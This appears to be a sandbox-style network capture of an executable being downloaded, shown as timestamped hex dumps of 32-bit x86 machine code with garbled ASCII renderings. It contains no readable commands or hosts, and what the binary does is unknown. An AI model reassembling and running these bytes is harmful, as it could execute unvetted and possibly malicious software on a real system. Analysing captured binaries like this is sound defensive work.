                                                                                                                                                                                    2022-05-23 16:54:51 UTC128INData Raw: 83 c6 01 0f b6 56 ff 89 d0 83 e0 7f d3 e0 83 c1 07 09 c3 84 d2 78 e9 83 fb 11 0f 87 19 fe ff ff 8b 45 08 c7 44 d8 04 00 00 00 00 e9 09 fe ff ff 89 de 31 c9 31 db 89 f6 8d bc 27 00 00 00 00 83 c6 01 0f b6 56 ff 89 d0 83 e0 7f d3 e0 83 c1 07 09 c3 84 d2 78 e9 83 fb 11 0f 87 da fd ff ff 8b 45 08 c7 44 d8 04 06 00 00 00 e9 ca fd ff ff 89 de 31 c9 31 db 8d 76 00 8d bc 27 00 00 00 00 83 c6 01 0f b6 56 ff 89 d0 83 e0 7f d3 e0 83 c1 07 09 c3 84 d2 78 e9 e9 7c ff ff ff 89 de 31 c9 31 db 83 c6 01 0f b6 56 ff 89 d0 83 e0 7f d3 e0 83 c1 07 09 c3 84 d2 78 e9 31 ff 31 c9 8d 76 00 83 c6 01 0f b6 56 ff 89 d0 83 e0 7f d3 e0 83 c1 07 09 c7 84 d2 78 e9 83 fb 11 0f 87 5a fd ff ff 8b 45 08 8d 04 d8 c7 40 04 02 00 00 00 89 38 e9 46 fd ff ff 8b 7d c8 85 ff 89 f8 0f 84 2d 04 00
                                                                                                                                                                                    Data Ascii: VxED11'VxED11v'Vx|11Vx11vVxZE@8F}-
                                                                                                                                                                                    2022-05-23 16:54:51 UTC144INData Raw: 00 00 eb a3 8d 74 26 00 8d bc 27 00 00 00 00 55 57 56 53 81 ec dc 00 00 00 e8 21 a5 00 00 8b 30 89 34 24 e8 87 a4 00 00 89 44 24 30 8b 84 24 f8 00 00 00 d9 ee c7 84 24 b4 00 00 00 00 00 00 00 c7 84 24 c4 00 00 00 00 00 00 00 dd 9c 24 c8 00 00 00 8b 00 89 44 24 34 8b 84 24 f0 00 00 00 89 84 24 c0 00 00 00 0f b6 10 80 fa 2d 0f 87 7d 01 00 00 0f b6 ca ff 24 8d cc 96 58 00 8d 76 00 8b 84 24 f0 00 00 00 c7 84 24 b4 00 00 00 06 00 00 00 89 84 24 c0 00 00 00 8b 84 24 f4 00 00 00 85 c0 0f 84 a8 01 00 00 8b 84 24 c4 00 00 00 c7 44 24 4c 00 00 00 00 8b 94 24 c0 00 00 00 8b bc 24 f4 00 00 00 89 17 8b 54 24 4c 85 d2 74 08 83 8c 24 b4 00 00 00 08 85 c0 74 2a 89 44 24 08 8b 44 24 34 89 44 24 04 8b 84 24 00 01 00 00 89 04 24 e8 7a 5c 00 00 8b 84 24 c4 00 00 00 89 04 24
                                                                                                                                                                                    Data Ascii: t&'UWVS!04$D$0$$$$D$4$$-}$Xv$$$$$D$L$$T$Lt$t*D$D$4D$$$z\$$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC160INData Raw: 66 83 f8 5c 0f 84 d7 01 00 00 8b 75 e4 b9 2e 00 00 00 89 f0 66 89 0e 83 c0 02 31 d2 66 89 10 c7 44 24 08 00 00 00 00 89 7c 24 04 c7 04 24 00 00 00 00 e8 10 64 00 00 8d 50 01 89 54 24 04 a1 40 9a 5c 00 89 55 e4 89 04 24 e8 a9 64 00 00 8b 55 e4 a3 40 9a 5c 00 89 c6 89 7c 24 04 89 04 24 89 54 24 08 e8 df 63 00 00 e9 c2 00 00 00 8b 65 dc e9 1a fe ff ff 8d 76 00 8d bc 27 00 00 00 00 8d 46 fe 39 45 e4 0f 83 61 01 00 00 0f b7 56 fe 89 c6 66 83 fa 2f 74 e8 66 83 fa 5c 74 e2 31 d2 89 f9 66 89 50 02 0f b7 17 66 83 fa 2f 74 11 66 83 fa 5c 0f 85 04 01 00 00 8d b4 26 00 00 00 00 83 c1 02 0f b7 01 66 83 f8 2f 74 f4 66 83 f8 5c 74 ee 89 c8 29 f8 83 f8 05 0f 8e de 00 00 00 89 f9 89 c8 66 85 d2 74 21 83 c1 02 66 83 fa 2f 66 89 51 fe 74 62 66 83 38 5c 8d 70 02 74 57 0f b7
                                                                                                                                                                                    Data Ascii: f\u.f1fD$|$$dPT$@\U$dU@\|$$T$cev'F9EaVf/tf\t1fPf/tf\&f/tf\t)ft!f/fQtbf8\ptW
                                                                                                                                                                                    2022-05-23 16:54:51 UTC176INData Raw: 0e f6 05 51 9a 5c 00 01 74 d3 83 fb 02 75 ce 83 c1 0c eb cc 31 c0 f6 05 50 9a 5c 00 01 0f 94 c0 83 c0 02 e9 17 fc ff ff 8d b4 26 00 00 00 00 8b 45 a8 8d 58 01 89 5d a8 eb 08 90 8d 74 26 00 83 c3 01 0f be 03 c7 04 24 b6 9b 58 00 89 44 24 04 e8 82 24 00 00 85 c0 75 e6 89 5d a8 0f b6 0b 80 f9 2a 0f 84 df 06 00 00 0f be d1 8d 43 01 83 ea 30 83 fa 09 77 1e 89 f6 8d bc 27 00 00 00 00 89 45 a8 0f be 10 89 c3 83 c0 01 89 d1 83 ea 30 83 fa 09 76 eb 80 f9 2e 75 39 8d 43 01 89 45 a8 0f be 43 01 3c 2a 0f 84 6f 07 00 00 83 e8 30 83 c3 02 83 f8 09 77 1c 89 f6 8d bc 27 00 00 00 00 89 d8 89 5d a8 83 c3 01 0f be 00 83 e8 30 83 f8 09 76 ed 8d 45 a8 e8 65 df ff ff 8b 5d a8 0f be 03 88 45 8c 89 44 24 04 c7 04 24 6c 9b 58 00 e8 e4 23 00 00 85 c0 0f b6 4d 8c 74 24 2d 6c 9b 58
                                                                                                                                                                                    Data Ascii: Q\tu1P\&EX]t&$XD$$u]*C0w'E0v.u9CEC<*o0w']0vEe]ED$$lX#Mt$-lX
                                                                                                                                                                                    2022-05-23 16:54:51 UTC192INData Raw: 17 05 00 8b 43 40 c6 43 49 00 c6 43 4a 00 c7 43 14 00 00 00 00 c7 43 10 00 00 00 00 c7 43 18 00 00 00 00 89 43 04 89 43 08 89 43 0c 83 c4 10 5b 5e 5f c2 0c 00 89 c6 89 d9 e8 f1 31 05 00 89 34 24 e8 29 1f ff ff 90 90 90 90 90 90 90 90 90 53 89 cb 83 ec 08 e8 35 30 05 00 c7 03 b4 d6 58 00 83 c4 08 5b c3 90 90 90 90 90 90 90 90 90 90 53 89 cb 83 ec 18 c7 01 88 e3 58 00 e8 bf 19 05 00 8d 4b 28 e8 77 b3 04 00 8d 4b 1c c7 03 64 e6 58 00 e8 59 9c 06 00 89 1c 24 e8 71 e8 07 00 83 c4 18 5b c3 90 90 90 90 90 90 90 90 90 90 90 90 53 89 cb 83 ec 08 c7 01 88 e3 58 00 e8 7f 19 05 00 8d 4b 28 e8 37 b3 04 00 c7 03 64 e6 58 00 83 c4 08 8d 4b 1c 5b e9 15 9c 06 00 90 90 90 90 90 53 89 cb 83 ec 08 c7 01 88 e3 58 00 e8 4f 19 05 00 8d 4b 28 e8 07 b3 04 00 c7 03 64 e6 58 00 83
                                                                                                                                                                                    Data Ascii: C@CICJCCCCCC[^_14$)S50X[SXK(wKdXY$q[SXK(7dXK[SXOK(dX
                                                                                                                                                                                    2022-05-23 16:54:51 UTC208INData Raw: 58 00 c7 04 24 40 8c 58 00 e8 c1 50 07 00 90 55 57 56 53 83 ec 1c 8b 09 8b 44 24 30 8b 6c 24 34 8b 54 24 3c 8b 59 f4 39 d8 0f 87 98 00 00 00 8b 74 24 38 8b 3e 8b 77 f4 39 f2 77 6f 29 c3 39 eb 77 5d 29 d6 3b 74 24 40 77 45 39 f3 89 dd 77 34 85 ed 75 0e 83 c4 1c 89 d8 29 f0 5b 5e 5f 5d c2 14 00 01 fa 01 c8 89 6c 24 08 89 54 24 04 89 04 24 e8 a9 a4 ff ff 85 c0 74 da 83 c4 1c 5b 5e 5f 5d c2 14 00 89 f5 85 ed 74 ca eb d6 8d 76 00 8b 74 24 40 89 dd 39 f3 76 b7 eb e9 8d 74 26 00 29 d6 3b 74 24 40 89 eb 76 a1 eb e4 89 74 24 0c 89 54 24 08 c7 44 24 04 cf 8c 58 00 c7 04 24 40 8c 58 00 e8 08 50 07 00 89 5c 24 0c 89 44 24 08 c7 44 24 04 cf 8c 58 00 c7 04 24 40 8c 58 00 e8 ec 4f 07 00 90 90 90 90 90 90 90 90 90 90 90 90 8b 54 24 04 89 c8 8b 12 03 52 f4 89 11 c2 04 00
                                                                                                                                                                                    Data Ascii: X$@XPUWVSD$0l$4T$<Y9t$8>w9wo)9w]);t$@wE9w4u)[^_]l$T$$t[^_]tvt$@9vt&);t$@vt$T$D$X$@XP\$D$D$X$@XOT$R
                                                                                                                                                                                    2022-05-23 16:54:51 UTC224INData Raw: 38 c3 0f 94 c0 5b 5e 5f c2 04 00 8d 74 26 00 8b 41 08 3b 41 0c 73 78 0f b7 00 66 83 f8 ff 74 2f 66 89 46 04 31 c0 38 c3 0f 94 c0 5b 5e 5f c2 04 00 8b 41 08 3b 41 0c 73 46 0f b7 00 66 83 f8 ff 74 2d 66 89 47 04 31 db eb a2 90 8d 74 26 00 b8 01 00 00 00 c7 06 00 00 00 00 38 c3 0f 94 c0 5b 5e 5f c2 04 00 8d 76 00 8d bc 27 00 00 00 00 c7 07 00 00 00 00 bb 01 00 00 00 e9 6d ff ff ff 8b 01 ff 50 24 eb b6 89 f6 8d bc 27 00 00 00 00 8b 01 ff 50 24 eb 84 90 90 90 90 90 90 90 90 90 8b 11 b8 ff ff ff ff 85 d2 74 0a 0f b7 41 04 66 83 f8 ff 74 0b c3 8d 76 00 8d bc 27 00 00 00 00 53 89 cb 83 ec 08 8b 42 08 3b 42 0c 73 22 0f b7 00 66 83 f8 ff 74 09 66 89 43 04 83 c4 08 5b c3 c7 03 00 00 00 00 eb f3 90 8d b4 26 00 00 00 00 8b 02 89 d1 ff 50 24 eb d8 90 90 90 90 90 90 90
                                                                                                                                                                                    Data Ascii: 8[^_t&A;Asxft/fF18[^_A;AsFft-fG1t&8[^_v'mP$'P$tAftv'SB;Bs"ftfC[&P$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC240INData Raw: 24 e8 49 24 ff ff 8d 04 46 89 44 24 04 89 34 24 89 d9 c6 44 24 08 00 e8 d3 21 06 00 83 ec 0c 89 d8 83 c4 14 5b 5e c2 04 00 90 90 90 90 90 90 8b 41 08 8b 40 30 c3 90 90 90 90 90 90 90 90 90 8b 41 08 0f b7 40 12 c3 90 90 90 90 90 90 90 90 56 53 89 cb 83 ec 14 8b 44 24 20 8b 40 08 8b 70 28 8d 41 08 89 01 b8 fe ff ff ff 85 f6 74 0b 89 34 24 e8 d9 23 ff ff 8d 04 46 89 44 24 04 89 34 24 89 d9 c6 44 24 08 00 e8 63 21 06 00 83 ec 0c 89 d8 83 c4 14 5b 5e c2 04 00 90 90 90 90 90 90 56 53 89 cb 83 ec 14 8b 44 24 20 8b 40 08 8b 70 20 8d 41 08 89 01 b8 fe ff ff ff 85 f6 74 0b 89 34 24 e8 89 23 ff ff 8d 04 46 89 44 24 04 89 34 24 89 d9 c6 44 24 08 00 e8 13 21 06 00 83 ec 0c 89 d8 83 c4 14 5b 5e c2 04 00 90 90 90 90 90 90 8b 41 08 0f b7 40 14 c3 90 90 90 90 90 90 90 90
                                                                                                                                                                                    Data Ascii: $I$FD$4$D$![^A@0A@VSD$ @p(At4$#FD$4$D$c![^VSD$ @p At4$#FD$4$D$![^A@
                                                                                                                                                                                    2022-05-23 16:54:51 UTC256INData Raw: 75 d0 85 f6 89 45 0c 74 1b 31 f6 31 c0 83 7d d4 ff 0f 84 28 01 00 00 89 f2 38 c2 0f 84 8e fe ff ff 8b 4d 08 31 ff 89 5d e0 8b 75 d8 89 fb eb 17 38 45 e4 74 51 8b 45 e0 83 ee 01 39 f3 8b 04 b0 89 07 73 49 8b 4d 08 8b 45 e0 8b 55 1c 85 c9 8d 3c 98 8b 07 8b 04 82 8b 55 dc 0f b6 04 10 88 45 e4 0f 84 1e 01 00 00 8b 45 0c 83 f8 ff 75 c1 8b 41 08 3b 41 0c 0f 83 a4 00 00 00 0f b6 00 38 45 e4 89 45 0c 75 af 83 c3 01 39 f3 72 b7 83 fe 01 89 75 d8 8b 5d e0 0f 87 d3 fe ff ff 83 7d d8 01 0f 85 09 fe ff ff 8d 4d 08 e8 51 65 05 00 8b 03 8b 5d 1c 8b 75 dc 89 45 e0 8b 04 83 83 c6 01 89 04 24 89 45 e4 e8 e5 e3 fe ff 39 c6 89 c7 73 3a 8b 5d d0 8b 4d 08 85 c9 0f 84 1c 02 00 00 8b 45 0c 83 f8 ff 0f 84 a0 01 00 00 85 db 0f 84 3d 01 00 00 31 d2 8b 45 d4 31 c9 83 f8 ff 0f 84 6a
                                                                                                                                                                                    Data Ascii: uEt11}(8M1]u8EtQE9sIMEU<UEEuA;A8EEu9ru]}MQe]uE$E9s:]ME=1E1j
                                                                                                                                                                                    2022-05-23 16:54:51 UTC272INData Raw: f7 ff ff 8d 84 24 f8 00 00 00 8b 94 24 5c 01 00 00 8b 4c 24 34 c7 44 24 1c 02 00 00 00 c7 44 24 18 3d 00 00 00 89 fd 89 44 24 24 8b 84 24 60 01 00 00 89 54 24 0c 8b 94 24 54 01 00 00 c7 44 24 14 00 00 00 00 89 44 24 20 8b 84 24 68 01 00 00 89 54 24 04 89 44 24 10 8b 84 24 58 01 00 00 89 44 24 08 8b 84 24 50 01 00 00 89 04 24 e8 ed e9 ff ff 83 ec 28 89 44 24 78 89 54 24 7c 89 84 24 50 01 00 00 0f b7 44 24 7c 66 89 84 24 54 01 00 00 e9 8f f6 ff ff 89 f6 8d bc 27 00 00 00 00 8b 03 8d b4 24 00 01 00 00 89 d9 c7 44 24 04 d6 62 58 00 c7 04 24 cd 62 58 00 89 fd 89 74 24 08 ff 50 2c 83 ec 0c 8d 84 24 00 01 00 00 8b 94 24 5c 01 00 00 8b 4c 24 34 89 44 24 1c 8b 84 24 68 01 00 00 89 54 24 0c 8b 94 24 54 01 00 00 89 44 24 18 8d 84 24 f8 00 00 00 89 54 24 04 89 44 24
                                                                                                                                                                                    Data Ascii: $$\L$4D$D$=D$$$`T$$TD$D$ $hT$D$$XD$$P$(D$xT$|$PD$|f$T'$D$bX$bXt$P,$$\L$4D$$hT$$TD$$T$D$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC288INData Raw: 7c 24 08 8b 7d c4 8b 4d c0 01 fe 89 3c 24 89 74 24 04 ff d0 83 ec 0c e9 42 ff ff ff 8b 55 d0 89 c6 39 da 74 08 89 14 24 e8 e2 68 06 00 89 34 24 e8 3a 9f fd ff 90 90 90 90 90 90 90 90 90 90 55 89 e5 57 56 53 8d 55 d0 8d 5d d8 83 ec 4c 8b 45 1c 80 7d 18 00 89 54 24 18 8b 55 20 8b 75 08 8b 7d 0c 89 44 24 10 8b 45 10 89 54 24 14 8b 55 14 89 5d d0 c7 45 d4 00 00 00 00 c6 45 d8 00 89 44 24 08 89 54 24 0c 89 34 24 89 7c 24 04 74 51 e8 9b ec ff ff 83 ec 1c 89 c6 89 d7 e8 4f 18 05 00 89 45 cc 8d 45 cc 89 44 24 0c 8b 45 20 89 44 24 08 8b 45 24 89 44 24 04 8b 45 d0 89 04 24 e8 0c fc 05 00 8b 45 d0 39 d8 74 08 89 04 24 e8 3d 68 06 00 8d 65 f4 89 f0 89 fa 5b 5e 5f 5d c2 20 00 e8 5a db ff ff eb ad 8b 55 d0 89 c6 39 da 74 08 89 14 24 e8 17 68 06 00 89 34 24 e8 6f 9e fd
                                                                                                                                                                                    Data Ascii: |$}M<$t$BU9t$h4$:UWVSU]LE}T$U u}D$ET$U]EED$T$4$|$tQOEED$E D$E$D$E$E9t$=he[^_] ZU9t$h4$o
                                                                                                                                                                                    2022-05-23 16:54:51 UTC304INData Raw: 0f b7 45 90 88 55 80 89 45 90 89 c8 29 f8 89 c7 80 3e 04 0f 87 ae 00 00 00 0f b6 06 ff 24 85 90 62 58 00 8b 45 98 85 c0 0f 84 99 00 00 00 8b 45 8c 8d 4d d0 0f b7 00 89 04 24 e8 50 40 05 00 e9 d6 01 00 00 8b 45 10 f6 40 0d 02 74 7a b8 ff ff ff 3f 2b 45 d4 8b 53 1c 8b 4b 18 39 c2 0f 87 61 03 00 00 89 0c 24 8d 4d d0 89 54 24 04 e8 cd 3c 05 00 eb 50 80 7d 80 00 8b 45 90 0f 84 8e 01 00 00 89 44 24 0c 8b 45 d4 8d 4d d0 89 7c 24 08 c7 44 24 04 00 00 00 00 89 04 24 e8 10 24 05 00 83 ec 10 eb 23 80 7d 80 00 74 1d 8b 45 90 eb d2 8b 45 bc 8d 4d d0 89 44 24 04 8b 45 b8 89 04 24 e8 7b 3c 05 00 83 ec 08 8d 45 b8 83 c6 01 39 f0 0f 85 3b ff ff ff 83 7d 98 01 76 2e 8b 55 98 b8 ff ff ff 3f 2b 45 d4 8b 4d 8c 83 ea 01 83 c1 02 39 c2 0f 87 5c 03 00 00 89 0c 24 8d 4d d0 89 54
                                                                                                                                                                                    Data Ascii: EUE)>$bXEEM$P@E@tz?+ESK9a$MT$<P}ED$EM|$D$$$#}tEEMD$E${<E9;}v.U?+EM9\$MT
                                                                                                                                                                                    2022-05-23 16:54:51 UTC320INData Raw: 72 04 39 ce 77 04 c6 45 a8 00 0f b6 5d a8 08 5d ba 01 c6 11 d7 83 45 ac 01 8b 4d 08 85 c9 0f 84 0d 04 00 00 8b 41 08 3b 41 0c 0f 83 9f 05 00 00 83 c0 01 c7 45 0c ff ff ff ff 89 41 08 8b 41 08 3b 41 0c 0f 83 76 06 00 00 0f b6 00 8b 4d 10 89 45 0c 85 c9 74 28 83 7d 14 ff 0f 85 48 01 00 00 31 db 8b 41 08 3b 41 0c 0f 83 f1 03 00 00 0f b6 00 89 45 14 31 c0 38 c3 0f 84 2a 01 00 00 8b 4d 08 85 c9 0f 84 07 06 00 00 8b 45 0c 83 f8 ff 89 c3 0f 85 d8 fe ff ff 8b 41 08 3b 41 0c 0f 83 d6 05 00 00 0f b6 18 89 5d 0c e9 c1 fe ff ff 90 80 7d b8 00 c6 45 ba 00 0f 85 bb 07 00 00 0f b6 45 b4 31 f6 31 ff 83 c0 30 88 45 a8 8d 74 26 00 83 7d b4 0a 0f be cb 0f 87 c3 02 00 00 80 fb 2f 0f 8e 2a 02 00 00 38 5d a8 0f 8e 21 02 00 00 83 e9 30 83 f9 ff 0f 84 15 02 00 00 3b 7d b0 0f 87
                                                                                                                                                                                    Data Ascii: r9wE]]EMA;AEAA;AvMEt(}H1A;AE18*MEA;A]}EE110Et&}/*8]!0;}
                                                                                                                                                                                    2022-05-23 16:54:51 UTC336INData Raw: 10 e9 f1 f7 ff ff 89 ca c6 45 c0 00 e9 dd f7 ff ff 0f b6 52 10 e9 17 fe ff ff c6 45 c0 00 e9 cb f7 ff ff 0f b6 5d c0 31 f6 31 ff c6 45 c3 00 c6 45 c0 00 e9 6e fb ff ff 0f b6 5d c0 31 f6 c6 45 c0 00 31 ff e9 5d fb ff ff 31 db 88 45 c0 e9 53 fb ff ff 8d 4d 08 e8 24 3f fe ff 0f be d8 e9 5e fe ff ff 89 c3 8b 45 e4 8d 48 f4 81 f9 f0 46 58 00 74 0e 8d 45 e3 89 04 24 e8 d1 24 02 00 83 ec 04 89 1c 24 e8 e6 de fc ff 8b 7d d0 0f be da 88 45 c0 88 45 c1 0f b6 57 10 e9 50 f7 ff ff 8b 45 d0 c7 45 e4 fc 46 58 00 0f b6 40 10 84 c0 88 45 c0 0f 85 f2 fc ff ff 8b 45 d0 c6 45 a7 00 c6 45 c1 00 0f b6 40 64 84 c0 88 45 c3 0f 85 82 f9 ff ff 88 45 c0 31 f6 31 ff c7 45 b8 00 00 00 00 e9 c2 fa ff ff c7 45 c4 16 00 00 00 e9 0a f7 ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
                                                                                                                                                                                    Data Ascii: ERE]11EEn]1E1]1ESM$?^EHFXtE$$$}EEWPEEFX@EEEE@dEE11EE
                                                                                                                                                                                    2022-05-23 16:54:51 UTC352INData Raw: 8b 01 ff 50 24 e9 7a f9 ff ff 90 8d 74 26 00 8b 01 ff 50 24 e9 2c fd ff ff 8d b6 00 00 00 00 8d 4d d0 c7 04 24 20 00 00 00 e8 01 4d 04 00 83 ec 04 e9 95 f8 ff ff 89 f6 8d bc 27 00 00 00 00 c7 45 ac 08 00 00 00 e9 96 f7 ff ff 8d 74 26 00 c7 45 08 00 00 00 00 be ff ff ff ff e9 ef f9 ff ff 80 7d a5 00 74 02 f7 db 8b 45 20 89 18 e9 d5 fa ff ff 8b 01 ff 50 24 e9 75 fa ff ff 8d 76 00 8b 01 ff 50 24 e9 07 fd ff ff 8d b6 00 00 00 00 8d 4d 08 e8 08 00 fe ff 8b 7d c0 89 c6 0f b6 57 10 e9 ea fa ff ff 8d 76 00 8d bc 27 00 00 00 00 c7 45 08 00 00 00 00 e9 ad fe ff ff 8d 74 26 00 c7 45 10 00 00 00 00 b8 01 00 00 00 e9 ca fe ff ff 8d 7d 10 8d 4d 08 89 3c 24 e8 f1 fe fd ff 83 ec 04 84 c0 88 45 a7 0f 85 54 01 00 00 c7 45 ac 10 00 00 00 e9 05 f7 ff ff 8d b4 26 00 00 00 00
                                                                                                                                                                                    Data Ascii: P$zt&P$,M$ M'Et&E}tE P$uvP$M}Wv'Et&E}M<$ETE&
                                                                                                                                                                                    2022-05-23 16:54:51 UTC368INData Raw: 00 83 c0 02 89 41 08 b8 ff ff ff ff 66 89 45 0c 8b 41 08 3b 41 0c 0f 83 43 05 00 00 0f b7 00 66 83 f8 ff 0f 84 06 04 00 00 8b 4d 10 66 89 45 0c 85 c9 0f 84 ce 02 00 00 66 83 7d 14 ff 0f 84 3c 03 00 00 8b 4d e4 c6 45 c4 01 8b 41 f4 85 c0 0f 84 7a 01 00 00 0f be 45 c0 8d 5d e4 89 d9 89 04 24 e8 29 bc 01 00 83 ec 04 89 5c 24 08 8b 47 0c 89 44 24 04 8b 47 08 89 04 24 e8 00 c8 04 00 84 c0 0f 84 78 05 00 00 8b 45 c0 8b 4d e4 85 c0 75 11 80 7d bb 01 74 0b 8b 79 f4 85 ff 0f 84 42 01 00 00 80 7d ba 00 0f 85 38 01 00 00 80 7d cc 00 0f 84 d9 04 00 00 8b 45 20 bb ff ff ff ff 66 89 18 8b 45 1c c7 00 04 00 00 00 e9 26 01 00 00 80 7d ba 00 0f 85 ae 05 00 00 8d 47 78 c6 45 cc 00 31 f6 89 45 b4 8d 76 00 8d bc 27 00 00 00 00 0f b6 47 10 84 c0 74 0a 66 39 5f 26 0f 84 4f 03
                                                                                                                                                                                    Data Ascii: AfEA;ACfMfEf}<MEAzE]$)\$GD$G$xEMu}tyB}8}E fE&}GxE1Ev'Gtf9_&O
                                                                                                                                                                                    2022-05-23 16:54:51 UTC384INData Raw: 00 0f 85 f8 fe ff ff 8b 45 10 8b 78 08 39 df 0f 8e 76 ff ff ff 8d 47 1e c1 e8 04 c1 e0 04 e8 3c f5 fb ff 0f be 55 a8 29 c4 8d 44 24 2b 89 5c 24 14 89 74 24 0c 89 7c 24 10 89 fb 83 e0 f0 89 54 24 04 89 44 24 08 89 45 c4 8b 45 10 89 04 24 e8 bb 67 03 00 8b 45 c4 89 7d d0 89 c6 e9 2a ff ff ff e8 89 98 03 00 89 45 d4 dd 45 b0 8d 75 d4 8b 45 c4 89 5c 24 0c dd 5c 24 10 c7 44 24 08 2d 00 00 00 89 34 24 89 44 24 04 e8 11 7f 04 00 83 f8 2c 89 45 d0 0f 8e 07 fe ff ff 8d 50 01 83 c0 1f c1 e8 04 c1 e0 04 89 55 a4 e8 b1 f4 fb ff 29 c4 8d 44 24 2b 83 e0 f0 89 45 c4 e8 30 98 03 00 8b 55 a4 89 45 d4 dd 45 b0 8b 45 c4 89 5c 24 0c 89 34 24 dd 5c 24 10 89 54 24 08 89 44 24 04 e8 bc 7e 04 00 89 45 d0 e9 b6 fd ff ff 8d 74 26 00 be 06 00 00 00 e9 22 fd ff ff 8d b6 00 00 00 00
                                                                                                                                                                                    Data Ascii: Ex9vG<U)D$+\$t$|$T$D$EE$gE}*EEuE\$\$D$-4$D$,EPU)D$+E0UEEE\$4$\$T$D$~Et&"
                                                                                                                                                                                    2022-05-23 16:54:51 UTC400INData Raw: 00 00 89 94 24 a4 00 00 00 89 04 24 e8 9e 3e fd ff 83 ec 04 84 c0 0f 85 c2 fa ff ff 8b 4c 24 48 85 c9 0f 85 b6 fa ff ff 8b 54 24 50 85 d2 0f 85 aa fa ff ff 8d 8c 24 a0 00 00 00 e8 3f 3f fd ff 80 7e 1c 00 89 c5 0f 84 70 04 00 00 0f b6 46 4a 89 e9 38 c1 74 26 8d 8c 24 a0 00 00 00 e8 1d 3f fd ff 80 7e 1c 00 89 c5 0f 84 64 04 00 00 0f b6 46 48 89 e9 38 c1 0f 85 62 fa ff ff 8d 44 24 48 8b 94 24 ac 00 00 00 8b 6c 24 34 c7 44 24 1c 02 00 00 00 c7 44 24 18 17 00 00 00 89 44 24 24 8b 84 24 b0 00 00 00 89 54 24 0c 8b 94 24 a4 00 00 00 89 e9 c7 44 24 14 00 00 00 00 89 44 24 20 8d 44 24 50 89 54 24 04 89 44 24 10 8b 84 24 a8 00 00 00 89 44 24 08 8b 84 24 a0 00 00 00 89 04 24 e8 4a ef ff ff 83 ec 28 89 e9 89 04 24 89 84 24 a0 00 00 00 8d 44 24 48 89 54 24 04 89 94 24
                                                                                                                                                                                    Data Ascii: $$>L$HT$P$??~pFJ8t&$?~dFH8bD$H$l$4D$D$D$$$T$$D$D$ D$PT$D$$D$$$J($$D$HT$$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC416INData Raw: 8b 7c 24 2c 89 f1 8a 4c 24 36 8b 07 89 ce 8b 4c 24 70 8b 40 08 89 4c 24 10 8b 4c 24 30 89 54 24 18 8b 54 24 24 89 74 24 04 89 4c 24 0c 8b 4c 24 68 89 54 24 14 89 4c 24 08 8b 4c 24 20 89 0c 24 89 f9 ff d0 89 f1 83 ec 1c 88 d1 89 44 24 38 89 54 24 3c 89 ce 89 44 24 20 88 54 24 36 83 c3 01 39 5c 24 78 74 43 0f b6 3b 0f b6 94 3d 1d 01 00 00 89 f8 84 d2 74 4a 80 fa 25 0f 84 1f ff ff ff 80 7c 24 36 00 75 d6 8b 4c 24 20 0f b6 13 8b 41 14 3b 41 18 0f 83 05 01 00 00 88 10 83 c3 01 83 41 14 01 39 5c 24 78 75 bd 89 f0 8a 44 24 36 89 c6 8b 44 24 20 83 c4 4c 5b 89 f2 5e 5f 5d c2 1c 00 8b 55 00 8b 52 20 81 fa e0 9c 43 00 0f 85 91 00 00 00 84 c0 74 a9 88 84 3d 1d 01 00 00 89 c2 eb 95 8b 55 00 8b 52 20 81 fa e0 9c 43 00 0f 85 8b 00 00 00 84 c0 74 47 88 84 3d 1d 01 00 00
                                                                                                                                                                                    Data Ascii: |$,L$6L$p@L$L$0T$T$$t$L$L$hT$L$L$ $D$8T$<D$ T$69\$xtC;=tJ%|$6uL$ A;AA9\$xuD$6D$ L[^_]UR Ct=UR CtG=
                                                                                                                                                                                    2022-05-23 16:54:51 UTC432INData Raw: d0 0f 84 b5 f7 ff ff 3b 5d b4 0f 83 ac f7 ff ff 8d 4d 08 e8 87 c0 fc ff 66 39 04 5f 0f 85 2d f6 ff ff 8b 4d 08 85 c9 74 74 8b 41 08 3b 41 0c 73 74 83 c0 02 89 41 08 b8 ff ff ff ff 83 c3 01 66 89 45 0c e9 4b f7 ff ff 8b 78 28 e9 3b f7 ff ff 8b 41 08 3b 41 0c 73 57 0f b7 00 66 83 f8 ff 0f 84 5a ff ff ff 66 89 45 0c e9 38 f7 ff ff 8b 41 08 3b 41 0c c6 45 d0 00 0f 82 6d ff ff ff 8b 01 ff 50 24 66 83 f8 ff 0f 85 6b ff ff ff c7 45 10 00 00 00 00 0f b6 45 cc e9 61 ff ff ff 83 c3 01 e9 21 ff ff ff 8b 01 ff 50 28 8b 4d 08 eb 88 8b 01 ff 50 24 eb a5 89 f8 84 c0 0f 85 05 f7 ff ff e9 8a f5 ff ff 8d 76 00 8d bc 27 00 00 00 00 c6 45 bb 00 e9 66 f5 ff ff 8b 45 1c 83 08 04 e9 81 f7 ff ff 0f be 45 b0 e9 47 f7 ff ff 8d 5d db 89 45 d0 89 55 d4 89 1c 24 e8 d2 a3 00 00 8b 75
                                                                                                                                                                                    Data Ascii: ;]Mf9_-MttA;AstAfEKx(;A;AsWfZfE8A;AEmP$fkEEa!P(MP$v'EfEEG]EU$u
                                                                                                                                                                                    2022-05-23 16:54:51 UTC448INData Raw: 4c 24 28 8b 18 8b 73 f4 89 f0 29 d0 39 c8 76 02 89 c8 01 d0 39 f2 8d 04 43 77 27 8b 4c 24 2c 89 44 24 04 8d 04 53 c6 44 24 0c 00 89 04 24 89 4c 24 08 e8 48 e2 ff ff 89 07 83 c4 10 5b 5e 5f c2 10 00 89 74 24 0c 89 54 24 08 c7 44 24 04 3e 90 58 00 c7 04 24 bc 8e 58 00 e8 71 90 03 00 90 53 89 cb 83 ec 18 8b 54 24 28 8b 44 24 20 c6 44 24 0c 00 89 54 24 08 8b 54 24 24 89 04 24 8d 14 50 89 54 24 04 e8 16 e1 ff ff 89 03 83 c4 18 5b c2 0c 00 90 90 90 90 90 90 90 90 90 90 90 90 90 53 89 cb 83 ec 08 8b 44 24 10 8b 54 24 14 85 c0 75 0e b8 ec 46 58 00 89 03 83 c4 08 5b c2 0c 00 8b 4c 24 18 0f b7 d2 e8 a4 df ff ff 89 03 83 c4 08 5b c2 0c 00 90 90 90 90 90 90 90 90 90 90 90 c7 01 ec 46 58 00 c3 90 90 90 90 90 90 90 90 90 53 89 cb 83 ec 18 8b 44 24 28 c6 44 24 0c 00 89
